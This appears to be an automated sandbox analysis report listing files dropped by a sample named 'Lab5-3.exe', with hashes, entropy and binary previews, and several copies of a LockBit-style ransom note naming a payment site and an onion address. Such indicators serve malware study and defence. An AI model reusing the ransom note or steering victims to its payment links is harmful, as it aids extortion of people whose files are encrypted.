                                                                                                          Preview:.............7.;........J..6.q.jdaN.3s..c....=<.......=...$m.$/.B...w7@.."..3.M.....c...3;..+.....s.*........n>...Z..$..@...b"z.M..%.p.C....?......I6..:.{`%gO.|<.\.%.D."...H7.n7e.;.m4u..`FKIw2.............X#.t......%o...OY..Z..8..*.........\...tK!.VnB.e..th.n..W(..w.P...^.5N.|A....E8.R.6/.]......a..t....W ...M.M0...Ai.&5k.*...%t..lv...)....HZ[.<EJ~>BK.z........Ywj.../.1.oZ+[..k...'.P.d{..DHq....B D.3...5..x..c$}....:.i..wn...rNo..E9E.D.A....p....$I-w............|P.5.[.a.)O./YR..M..@.B[.g..D.]..:/.c..,N.|^..}9,M.:;9.6M./.!..*w...&D..E.=......H......Q....|5lFj^.C.*.J.5c.O|...J..+..s...?%.iFW.%B..P$..\O....,.`:..=."...+k.Y./.wv..(r...".gr$...E-:;g.&.hR..x[.T.Qaz...5.{de...[..wJ.f....b.1..T;..e.......b_wM..q>.}..)..F7....,.8EOrj..N..2Q]...a..............<...=z.A<..L..Lp.g!0rHVe..K..E......E..gFw..o..Gt.Hx.0...i.d..*.......I<.r....qm.zf~ IOK.1...P.E.-.w.7IC..=...1.^........y.[}..e.w.P..=......f7.*..d....A.[.>-N..z;..7.@..`..a...)u........*
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):28592
                                                                                                          Entropy (8bit):7.993754988550081
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:INwChvj+Vere9Yem6y3ktuh+5eIOcflqSxrS8zZ:aDJSGeKnktuhbIBtqSxrZZ
                                                                                                          MD5:6F4F19DDD237B233135CD9956BD8B71E
                                                                                                          SHA1:9E5F2BB21F9D3C20C6F8E84F08528618544B6D2D
                                                                                                          SHA-256:BF01DA082FEFA48901D31F9DBA24D98397E3C5E778F44CAFEE03B3DAC0609AF6
                                                                                                          SHA-512:25502D9E0445DECDBBD5D6AEF1717EA0B5169986B2F44C143DAC335B5C9A65A75BDF7C604E7FA940D6D36838223770340B4C1A979A1C92A5FE078CE4E9F8CE28
                                                                                                          Malicious:true
                                                                                                          Preview:.....U~......z....(;:.xh5+T..b7...Q...o2..3H$..4.[.#*...e@.TkxE.1fI*.r.x5.8;2.c..M.......0....x>l..Gt.HQ..y.c.'z...3.A....r-....".6.r/i0j0.......v......>..z....E{.CKQ.e....8.YH.....?J....$)k....d+..*4.@...g.M.".V+$T.c."...G..E...~..(..@..h.7{qk.3..K.V......Mr.........B.@.q*...U./.f".i..C.CA..>d.tt}.p......]......y.\.,..-W{=.n..B@n..@j.......!...&../^...Q..f.dB4.[[.s!..X....l..,. ....:62...-........+..BLL>..1.3..n7xk.>}/-. .$.8,K..H..w....S&.g^C.$.H...G..l.A7..-....yfJ......R...G%..F.%.soD.gi.......j")[.....@lv......v..=..cX.*pD+...NF.O...m..a........RY.>C.Ya0...M....^.&.f_z".$..).1.'.z.!.$....R.F.8.l.......k.%.../.1M2....R"]..6i..+oc"..Ts9{.`.`_....k.c.....*.l>...d.om.d....G..u8z..$..S...a.F..[..(..V.I.k....k_..w.S.,......$iu... Y....Cx?...yB....p..|....C..d.0f...1<.......L......_9.e-o.:27Ib....B.f.j..w...PYk.{R...B.]]}...\..zeT....G....<..&ru.;.ZD0...&P.+UDM."aHY..A.....2.4.1..H.5.UmE_A%$.3!.&5......P8..#C.\...!R.M.E.....p.......r#.LJ.y7
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3248
                                                                                                          Entropy (8bit):7.947265729479389
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:wpsG88Bs4NdHz6WiWrKvcEFAFGx0uKeY2ElUJ:wpsFuOEEFAe0Cb
                                                                                                          MD5:D1C06B63087C7FD57A92D0B9FA7C6743
                                                                                                          SHA1:76CA9779BF8859EC45D22526A2B9A725C3D22D72
                                                                                                          SHA-256:79FCF187E7C5D88A9810FC4152717D678836AC4EDA0A09E080F3F81AE79805AD
                                                                                                          SHA-512:A69CFE470048D4DE0A5320DBCB6A8DDF2EAD950AEC8E9C310A2C2C2C05C545023BF0704299F4134B332546EA17CD8A4A272B661C10953933A02E83AFD44E1908
                                                                                                          Malicious:false
                                                                                                          Preview:....[.I(.O.....nI....(.rccYY.=.4....5......b.^....)3"o...... .\P.....%N.v....K_`j.6"T.....<A.\~.........'...G.HwrD..y...v..5PD.A*.-.V..f.N^...7.....U]....~T.u...C.4.qkG.%....S.M.o.1Y.b...=.b....%.9mg.-4.._...]....al......Z.e....e2..9.k{..:......3....($~.6b.:L.h2. .p..6.rdB~.!.^5.a2}6...?3#....$...?.x......6..MI8.P..9._....5lk...._z....@iV....6.I!.@U[-......9.3......J$."...>.4%'..._Z.~C..uD2u.$....i'.9..@8.."b[..ZW..3..0v.p.t.....E}.kd....8............j"2...(.D...HE....w...w.|).Q.6..%...$..|Y...0!g3..mr..;`..)..fjR...<..d..4.n...G=A...K.V@..gW..6.DR....`.h..xv......]./v.Dv..WE.e.c;...s.y`..B.%.G..>...ZW.....r.=r....@4..,/X....<...,.uM0N.s6....s2..I... ....7.......tU...[$.+...E...S....m...D.."[...>.2....3..uTA.Z.M.Z....E.K.P........z.i......j..9....ke.[.G.L.".).....g...a....l.'.t...5K...fA...pN..sJx..9..{.e...X.E.!.Xd7b[5..o:d...p..D..[.0c.ub}...qbon..b...#.....i......4.$..N..K......-.........@..mB|c.........T....~.....^q..f.y"o...S.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):616150
                                                                                                          Entropy (8bit):7.9815559986500695
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:KeXQhaCiBQxpS6gGyAeoGB8p2nKs8SNP+QSsTilM7jzmj8gNPEXoO0Tehfi:+ayWd3B8lmPLTL7jzmwgNEXoO0TO6
                                                                                                          MD5:68AE7D78DC3EA4A1E5067A31C27FD275
                                                                                                          SHA1:71304E8064BDAE37371233D25B57A453DB66A6D8
                                                                                                          SHA-256:47BBE7113759C5BBE86674CDCDFE41F192765A9A98670C5831716E05AF67D44E
                                                                                                          SHA-512:261D050E0957C053D1336B102C4A569BEAC0CD2840076EA3BF0894D261ABAA8D02222D3E2BED62080E0F70C696D0358A581EB634B33DCBE1F9EF846ECCAA6178
                                                                                                          Malicious:false
                                                                                                          Preview:7t..;..mk....5...&..[X.K......^f.....b....:q...R..d*<....;$GNF.[.....J.^3.yY@.Q.'uK.{.g............0...M.;3'...<w"'....k.a....Z_u..{..dG.sc.x.9q.r..+..s.n..cd4.../.i.w.|.!L.d.x.t...h.$.'_.w@.p[hH.../..H.O...7L..E.R..(.H.].....8Y.....|N.K.....,^.$s. &...9kp.....Us.fOy.R#./...,..b..e9Hp.^).....%.Mi.......z....&.et..~U.g.z..H...6V.. Jy ......<U....rd.W...{...%.....Y..F."?o..x.8.;9A...[.......Y...Y.<...5.\..U'/.>2........c....$........>.`,.....Jn... ".....p....t(..d...=.~D..+y5|...?...6`...}q."!...S.%8.%.....&...G.....1..|.......sG.T,...V..j.-..1..............n1.g.....53..........}.LX .f.......a.=.CaPY..0.../..0......w=..pI.{..I^..n;._.hw!..../..........G.C.A.M...=G.L@.Sr.....k....r.C..tA..b.0..Z.N..;.'..s..0..x....~.Z.......".S_M......2\R.q...Q.o.f....34A.s.*.n....3.O.*..[[Q..`..SHq.......\........N...N.(....hh.(&..U..!~...S.1.9M.wq.]Z.0|n.3t..MH$....o.&.J....(..oR..Y...oU.L.x`&:....2...NE....y.gx......l..6n....<......^.......OS... ...;T.'>.)
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):920061
                                                                                                          Entropy (8bit):7.97107188454848
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24576:HScohqxQqS/K5Gh7FR8+mZaSrvsvQt8aw8AbaMER6edhOLoJW:H7WqS/IK7FRJmdwQO8kAjrOt
                                                                                                          MD5:57DBB43DAD65735F4909B09C44329890
                                                                                                          SHA1:413BA68AD70AE4A23F4CC848395E0E4A8F38D4F5
                                                                                                          SHA-256:FC51AD5F47529B4D1408D136CABDE94A39DD9C0D49EBFE0A6C058A78F0DA968C
                                                                                                          SHA-512:C008EFC1311C3F434F3C9412991C3F6331331504DAE39F2D3AAF3131EF631DFF1B842956A8DD28E1D08815F9DE98F11CD40F9D4E834608F7D4CA12A3C32DBCEB
                                                                                                          Malicious:false
                                                                                                          Preview:f.....S!Q.^}.j)k...XW.qA.....oL....g.9(.I^V.g.2.D.)..U..........Ud...i.E..c..q..lc.Y."..SS{..4W.......~.d:...3...m..Q...`V...X.D.u....I.r..U....9.1.d..+.....02-u.....*.k...oM.y.G.0..&_.R<r&.....?....X.#.K$f...J."#...i.6.\....~.k.oM.}.T...5t.H...8.wtR..m.....I.G....DsH...X...f)S..9M~'.7!.M..W..%....q....%.Z.....8......uq.r[.!.H...D..<>.....s..#P..g>..@m......b..xu.....Y1.#.T/....4K{._wH..v..o.Eh]|$..Lp!...R...}e..."r......4....Q..^..4.F.c..:m.'...^..dkvE~.....kIM....]5.N.s.\.m..@..|....4]P...`..^....&.&PCe.:...**`.agv.[.......Y..k.).{S9p...}......n......g...,......B..g:....).......8.I.6.y.z{\.D8./...^....`a.w......;A^....U.;~>..cTT8....d_.......vZ'. (. ."..@..6.*..n..@.).a.R.....JR.....64.&.8.....<.{..h.eT.,-....v."}......<.t.NL<y(...].&.m....*.(......T.."...8...[..'i...1.2H..(.X.....P.".AN.o.;.y......Q.0y......$.]#.$.c..L.,...T{V)....60..e#.(1..G..N.<of..Hc@...b.........Z.......{7..u.....[.......N~.....'...Z....+72=.2.:.P%Hn...vW.}..1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):10452592
                                                                                                          Entropy (8bit):6.331547354016885
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:196608:CgzwSv9AAyse6liXUxCGZHa93Whlw6ZRnGr:UKlysTliXUxCGZHa93Whlw6ZRnw
                                                                                                          MD5:E1F59EF3A4C86F31D9C9C41E0C1E44E6
                                                                                                          SHA1:5D00060AD6402941A016C2BD15895BA1A2CCA326
                                                                                                          SHA-256:7C9C9A72A09686053A36EAE2147CAAD631D760B2849A9E05A8B1947DF2CD5463
                                                                                                          SHA-512:86C344F7F8873EBBEF1C1EF78BC361AA8FACD19BCC3178543C4B7119013176507EE4D4E74C3B56055CF54FB867D8D72AD0D159BB32FB91B2661DCB35B808C2BA
                                                                                                          Malicious:false
                                                                                                          Preview:...o........K.8..&...f....6.^..+..}....?m.n...$....x...%m.~....P.,...eMh$...x..QYq.I..2.o.Q.F.`.._....[d.3.....?..r.c..g?...#>..;:Xv.g....-!....v.{..?.,.-s.4.dq~4...S.k..K.M.}/J];.)/...X~...^.l.6)..9....c...@..9.,.H<_.A.b.Z[.......|..........,.....T...]......M.*~........Ey.m!...yF.B..V...r,.o.H.. ..7..#.....<...t...D...2D.;"....oivC..Z.^.X>....q......k\./".y.[..rff.~.....+...7..B...9...N5.b.&E.._~1.u....9.....0.Hv..o....Hqic...&...7..p.U.a.p.C.i.H.b.Lc..NM...7.K..S&o .qJ....@.0.A.&.......^S..y..gH..s.a8.6[.`.a..q=....ZH.5s:.6.].;R9y...Sl.aR....i6...pU.U.8m.W..].[^lE57.......,..X....A.-....*.7An^... .G..1..L..[.K:wX..{t..lH....7..<".V.p.!Y.W.A.F.J...O.W.....6%$aSe5.@...O..@.z..wSY.....*...L\5...D.G./..".....#...:..A...#g..5ry=..J.U@6..D....F......~|o.Q.....,.%kl.Tv.H.f.I@...5...1.....?.4.....Ep.|..zj..z..o.K.8......&_..kr.~M....*..AzQhg.<..#..S.....\.....*.....1.:..[....%_i2.g...."G.R.4..6L5..\.....r...^....+O...%\.p^......@.)....q...E..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):342506
                                                                                                          Entropy (8bit):7.758430959295942
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:nh6NKn54OJbR7q9xeqixt+qhLQ6+4QqIRL11n8NwMZ:nhvhR7qcxt+Ac6+ZZD18Nww
                                                                                                          MD5:AC31A9322D19969AC96CB17889FBB81E
                                                                                                          SHA1:C1A7D99462E3D290D6A13312E468B365A18983AE
                                                                                                          SHA-256:2DBE5C4D5B2E0065392813298786FF8FA651D177BDC605DF389D3D8A9C6A0ABB
                                                                                                          SHA-512:9060F0E25F9544EA33BA2B834B9B9DCFE4808B0627B922C6A351B3C367217860DBDA85802B92267F09B88054ECD8654D8502005DBD9D4D80BEF8DE2AB402EEDC
                                                                                                          Malicious:false
                                                                                                          Preview:3..W......r.F....V.\tP..'..[..........+(.2...........x.C&..........X(.|:...Z.P...dz.....*.4....g..S.j......me...#......x[ng.h..i@.#g.9..j.g9H...PC.~..;.........#+...&..z.y.G#l.._z...%...j.E....{WD....Q!.,eD..dv..o.y......y7j..x.$].b.^..g.-.xgA..u/.3.`..r...(..*.9...:RO<4@.T.R.p.,.Uo..qK).....z...5Q..r...T.G... .....V.g....W1...E"...z.p.<..M.p.c7\u....0.y..1)..s......*.;.~-A.{.DW....."a.O.2.`..@ja..X..g)8Um..5h....2<}#.w.%^2...u..k..G.A...&<.5Xi..3t.PF.gF..^a...o.).:>....L...M...OUM.z1O.ZH..nf....@.<g'~....;....*.../A}........../a.G....R.....^]..7.xg\.....2...C.=.+.z58.D.5.F.......x....Wo&.h,..b.....t=.N0.;.p.P...2...W.k{..v..x..'N.......G..TF...Hm.....h.....O...E..VT....eA.1}.|".E0!7....A...........vs.y.5....YN.!$....p.V..<..fY..QEJl..$g..l..\.+..-s..eAS....m..>Z :,....k....51BY.c..USP...1...D......K..TS..Ym5D...d.,qr>.....ccv)..f!<$e..Gul..9./8K..N.2.{@...ob(.Y,..y..mm.j...N=O=..#..4..@.S.........X..9...j....m.E,k.NJ)...z.W..0..-....C.....|.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7422412
                                                                                                          Entropy (8bit):7.997137222449584
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:196608:X87bMi9AF4cC5G05ix3m18orDhYVskrDIleMPXWSF:s7bMU64v85+BOVskrDlMPXfF
                                                                                                          MD5:5A5AA7986CEA6DF903D48A6B92CE40C1
                                                                                                          SHA1:3309EB076070554D5BC666A1DD6A8F1F43E48E38
                                                                                                          SHA-256:3ACBCE48EBD3AAEAC33DC3A1B670981C01388E8FE494F276F74A5DD1A7AF13CD
                                                                                                          SHA-512:014C545F6C83DB16C14ECA5F30285F97A3532B6F6ADBF01C3EE024CFE4BC8E70E133287759F27BBC1657FA76B6B78DC6BBE35596C15B698258F5809FE3CA5ECE
                                                                                                          Malicious:true
                                                                                                          Preview:r..=H.."e..i..S ......{q..o...{..nq?...A..l;U......m/...........<..H....V.=^$..=:#d[..&..a..GAM9._x..l...{m.+Aw....^yi..7.=...H../.'.]4*3{..<.)".+.A..[...........YQt..Dk|...O..$.o.......d`.:.5.6_.Q..L./.`......%a...6V...h(.R..8....CI......w.kf`j;@..m.].@.x..@ ...b&...r.v....)El.....9'I4.T:#.6.n,.O..m.}...t.>.....".;.>..?.|.....Q*.G....)2.9..cg...@..T.. x.~.f....C.Hc.&t.%....P.6..n.....v4.......Lt..7..c(./B....t=6....ad..EV....v/3rC.p.x.u...WS.`.$..2....K@I......'..y...th...=..wd.G......T:,...}././.A.p.1..4.d.......T17..........y.>@.".....f.!my.<.F M.......#.!_s...R80p.J..go......>.[>.,..r.(P......"....Q.iI.s......(JlP.q1u..'GI]_^ZyE..f"p.....T.4U...p..'.<N..1.\....Np.`.Mq[..S....5..SD3V..../NG......qli.guXn>.=..Z&.....B...z..9....U.mQI4Nu8.%.<...(...`..b.o9;..vdT....S.4t<.c]S.-.Q......=.....[.p.W.........+.[.!......z.uD>'.y.zA.9...v.....(h(.=h..#40.|..Dm..T...w..(MT.Cn.."V.....M..'.P........j...o.S........O.*.3.v..&&.YT....wX..ZQ.\?...F."...m.}.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1664
                                                                                                          Entropy (8bit):7.893663664203466
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:tWvGNkHfUTid3hBaUoSGFcmeykEdEElU92i:tWvIjGx0uKeY2ElUJ
                                                                                                          MD5:F4937B49957CABC0EB24C2567158AE68
                                                                                                          SHA1:F490167F22AB3DC13C1C0BD212DC88D5664054A2
                                                                                                          SHA-256:32BCEBD69403158250F183ED9D6EE967BD129231FFC3F50F45543D66991874F6
                                                                                                          SHA-512:2619D576D37D6E94C508F54F7968FC86B6F7F4712E4FBB6826ACC5572AA57E480F626FF22BB20AA9F3C2A28D20D2DCACEFA4E61801107FED19998ABD44CF223B
                                                                                                          Malicious:false
                                                                                                          Preview:c...../....\IB>.......]...=..&:FY...Y._.Hyv.p..;...I....G....x,...\..&..!A..RO.1...yvn..E*.Q..g...j\N.wP...J.....B..toRm......&i..>z......V.Zf.)`.~...w.......y.&....E<...=.t.TK..Q...$....HKdB..0.I...Tu0.T.>.sL@..w..9.v.....Q...6...E....`.iN...1.+.Zf..\h.......b...&.t...@...|>-..n...r...g.k3D@..V....%.\}x%..&..s)....I...V-=..r...}...~|L..:....rD(....^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4160
                                                                                                          Entropy (8bit):7.961956628344153
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:VHjtofQ2dAq8w1j7vC2U/nUf+wa9iAK92uqMsGx0uKeY2ElUJ:VHxofQ2dx1C2U8f+wFAB5Mf0Cb
                                                                                                          MD5:CD64BE7542236126CBD0B997D47E1550
                                                                                                          SHA1:1FCCE06F2A036D24BF226B6BD44CF7EE75B05403
                                                                                                          SHA-256:85CBC42CB6736928934894145F99D8B019714F3F5D803E6DE955C8CA69875FF4
                                                                                                          SHA-512:C295E38D6B5BACE5ABB45226499FFFA5A47C3136839FD23908C85857929288A234768D4DE02DB6DE3A6A12AABC651A75ACB3C6D3E8B6889830CA2DBFBB512D51
                                                                                                          Malicious:false
                                                                                                          Preview:..0.;M...Q......2..N*&0.4.,.N....^9...4....7..1..m.../.?%w../...eK....P.Zd...2.^.h~...m.w...O._sC{.m..}.:Z.j..a.........'8x..2...x\?...w......"....P}:...MF..q...5k.I.9.w,.x.C....J*..AI...c..`s.../Sz..f...!R....{.M........._F.d...3:...x.(o.\.z.;'../.G....S..........*?..L..g.m...AqT....u&...3..F|.......y..3II..zx.m.X.........*...........P.........X..u.[_.b...vx~......._.AW..n.S$}+.....#.z...#....q......&..F.G..<..l.`.uqyJ......4P..<.5.a..8.D..U..n..}.S.W..I.5x.dT.6.%gOc........_......Q..#F.......s.....9..`V:..[..URn%......f..V,....98[..7...8.}5....@q.i.G.g...]UP.{t..m..D.d.F8...Lu...3{.P.{D..B;..Q!y`N*.6M]7...>....d~..}.C".......g..#b.....a......%z.@.Wh..7.Wr..\../.M. .5..BNE. bgB=67Z.........0@../..;>.q.......(......e.Xz,\....s......@.Q...^+.gq..(d...s|/...3S...P.~1..!RU.....^...w.)N.v...2ua#...;s.z.....@.v..T..C}2.l.*..M.<....@J....=... ..n.-.y>.C...rY..@.}..@g..o2:..x.gb...Q....%.......i: ~cG......3.w.8....h<..)K..B.2..0t..p>..m..j
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):248144
                                                                                                          Entropy (8bit):7.999181425442251
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:6144:yWYRb3falZXOTEddzxSSfpl037oVI46CLpxItx8zNyZ:lYJ3fazQWdzx/bLVDLbIL8zNm
                                                                                                          MD5:F96E82EF53498389F1D026DE5BBA6410
                                                                                                          SHA1:0EF9993E31B3C536544C2228F0EDC4B0DCD9C13F
                                                                                                          SHA-256:B772BA033009ACA4722B9D735B708DCD8FD232EBBFFF574B6D1773E3D7D9C843
                                                                                                          SHA-512:514D679A824CCF41BC70406D1334147A5EF8867250D8811FF175C2CCD68467DFBD9E0A200FBE7D42890A0BDF3796B66A0571830E9245DC8B295787D6DA29D674
                                                                                                          Malicious:true
                                                                                                          Preview::q..j...i..5...}...@...:8(.....0-*.h..N...3....Y3....f.4..A.i.. ..W.7..^.F...U1......NK.+..~.aY.he%K.b..U&P.|...Y.3......K*Xe....J...f.R..j.....Tk.1...B..x.&..........C.....5...v.u.....C...#c.V.bD-Rk...+..>.....C."_.m...H.+..~'5...?w;.8).. ..fsy.'uJ...&!I....W.....O...`........I...*...L..v...{.F...@..0.E?px...K.."D.A...q........f.'l.S7.=!........w\....`.......c..+...E..(...9ap...<o.....t..p.V.&.....|v...>....{C.2f.v3.}..$.Czn....v..^../...|............1...Dm-..m._.0.=.2d.X......#.f.`o.k.....l.6@.M...>.'.%.X?.R...l.S.....p.O....q...M.....u.d../w..b...C..J..z)2v...e..8&..R....QB.X...)..:....'.*$....U..zq.._..[.^,m..v. .....0>r\..m.#......S+.*..K...("...!..+&.*.0t^.......X.@k!......EG.K.+c.|...L.D.5......E.8*.*3...'#.v........jN.f...Q....z..7.W...g._d........V)Ei.h:.!.Q.K.....y.'._[.p......Q\-.<m..zv..u..,.)..G.*....t.M.....^v...XZ.C....Ad.R.~}.z.o}..?..o.<..e.PV...$..j..._y..E..Z...q0......3.....Q...k!?....,W.....":..G....|i.Q.C..)...b.zO.....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1952
                                                                                                          Entropy (8bit):7.912202095980723
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:0iHK+2PY9InFPhFmjjHfUTid3hBaUoSGFcmeykEdEElU92i:0yK+uZFswGx0uKeY2ElUJ
                                                                                                          MD5:824032B431F16BCEFD984F580A90465B
                                                                                                          SHA1:00D296CAC551B4A35601CC53CC91606BF11E7FB2
                                                                                                          SHA-256:31D5F04D8F743C87FA27A83A53983D87169A2CF0C58F508D1727E0E200566192
                                                                                                          SHA-512:57E6A329A5E863E69083F457EC0B9A8C523EC6804966896915D7B1849EEFD9DA50F47B57A2D9FB26022824CD7F7E3B3D37FD4AA8ACE2B1D0DD4F5C8814CFFD62
                                                                                                          Malicious:false
